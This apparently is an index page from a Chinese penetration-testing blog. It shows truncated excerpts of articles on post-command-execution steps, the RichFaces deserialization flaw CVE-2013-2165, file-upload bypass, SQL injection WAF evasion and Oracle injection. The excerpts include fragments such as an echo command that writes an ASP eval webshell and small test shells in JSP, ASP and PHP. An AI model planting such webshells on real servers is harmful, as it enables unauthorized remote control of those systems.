-
命令执行总结
0x00 前言命令执行后有关的一些归纳(持续补充)。0x01 基础详情针对命令执行后对系统做更深入的渗透,常规先判断系统类型,命令是否回显,以及目标系统是否能够出网,即系统类型->是否回显->能否出网。1.可回显webshell(apache tomcat nginx等可直接解析脚本的写入webshell)windowdir /s/a-d/b d:\*123456.asp #查找123456.asp 位置echo ^<^%eval request^(chr^(35^)^...…
-
RichFaces反序列话漏洞——CVE-2013-2165
0x00 前言 本来想学二进制来着,java又出了那么多漏洞,身为一个web安全狗,还是学Java web吧,几乎0基础,大牛请跳过。碰巧工作中遇到实例,就尝试简单分析一下这个(很水的一篇文章四处摘抄,就是想立个flag开个头)。0x01 基础详情在讲述之前先简单介绍一下java反序列化的一些特征。黑盒测试: rO0AB #数据包中有以base64开头的数据开头含有ro0AB yseriol生成的payload转换而来 cat payload.out | base64 -w 0 &...…
-
file-upload
0x00 前言 对文件上传进行一个总结,如果你还没有看过Upload-labs通关手册,建议先看,本文是对其的一个简单补充,另外本文不对跨域等进行总结,后续会陆续添加。0x01 通用1. shell<% out.println("Hello test");%> #jsp jspx <%response.write("hello test")%> #asp asmx aspx ashx soap web.config<?php echo ...…
-
sql-injection-fuck-waf
0x0 前言 0x1 注入点检测 0x2 bypass waf 0x3 自动化0x0 前言 这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测 一般的注入还是很好判断的,特别是基于报错,但有的时候略微有些奇葩的环境,再加上一些乱七八糟 waf,就比较难搞了,这里简单总结了一些方法。 利用数据...…
-
hacking-oracle
0x0 前言 0x1 信息探测 0x2 命令执行 0x3 实战0x0 前言 在乙方做渗透测试的时候,经常会遇到oracle数据库的注入,这里是针对oracle数据库进行sql注入一系列总结,其中绝大大多数知识都是跟着各位大哥或者前辈学来,感谢他们的分享。 测试数据库如下: ORACLE DATABASE 10G ENTERPRISE EDITION RELEASE 10.2.0.1.0 Oracle Database 11g Express Edition Release 11.2.0...…